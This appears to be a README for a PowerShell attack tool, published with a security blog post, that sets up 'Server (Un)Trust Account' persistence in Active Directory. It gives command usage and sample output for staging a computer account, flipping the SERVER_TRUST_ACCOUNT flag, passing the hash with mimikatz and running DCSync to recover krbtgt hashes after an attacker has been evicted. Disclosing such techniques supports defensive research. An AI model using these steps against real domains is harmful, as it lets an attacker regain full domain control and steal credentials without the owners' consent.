Home

Awesome

Server (Un)Trust Account

Server (Un)Trust Account is an Active Directory persistence technique we uncovered during some other research, and have not seen previously documented. It allows an attacker to regain domain administrator privileges after losing them or being evicted from the network; simply, they must only regain a foothold on any computer. With that, the attacker can abuse documented behavior of the userAccountControl value SERVER_TRUST_ACCOUNT to promote a previously staged computer account to domain controller privileges.

This code accompanies a blog post, which provides greater detail.

Usage

Add-ServerUntrustAccount

This function creates a computer object with a known password and grants the necessary permissions to exploit SERVER_TRUST_ACCOUNT persistence. It is designed to run with domain administrator privileges and performs the following activities:

PS > . .\ServerUntrustAccount.ps1
PS > Add-ServerUntrustAccount -ComputerName FakeComputer123 -Password "Abc123!@#"
PS > 

Invoke-ServerUntrustAccount

This function utilizes the permissions and computer object created by Add-ServerUntrustAccount in order to regain domain dominance. It sets the UAC bit flag for SERVER_TRUST_ACCOUNT, then uses mimikatz to pass-the-hash as the staged computer account, and finally performs a DCSync to replicate the krbtgt hashes. It is designed to be run by any authenticated user in the domain.

PS > . .\ServerUntrustAccount.ps1
PS > Invoke-ServerUntrustAccount -ComputerName FakeComputer123 -Password "Abc123!@#" -MimikatzPath "C:\Windows\Temp\mimikatz.exe"
Hashes for KRBTGT:
  NTHash: a3dd...
  AES128: j916...
  AES256: k093...

Remove-ServerUntrustAccount

This function removes accounts and permissions created using Add-ServerUntrustAccount. It performs the following actions:

PS > . .\ServerUntrustAccount.ps1
PS > Remove-ServerUntrustAccount -ComputerName FakeComputer123 -DeleteComputer

Confirm
Are you sure you want to perform this action?
Performing the operation "Remove" on target "CN=FakeComputer123,CN=Computers,DC=domain,DC=local".
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "Y"):
PS >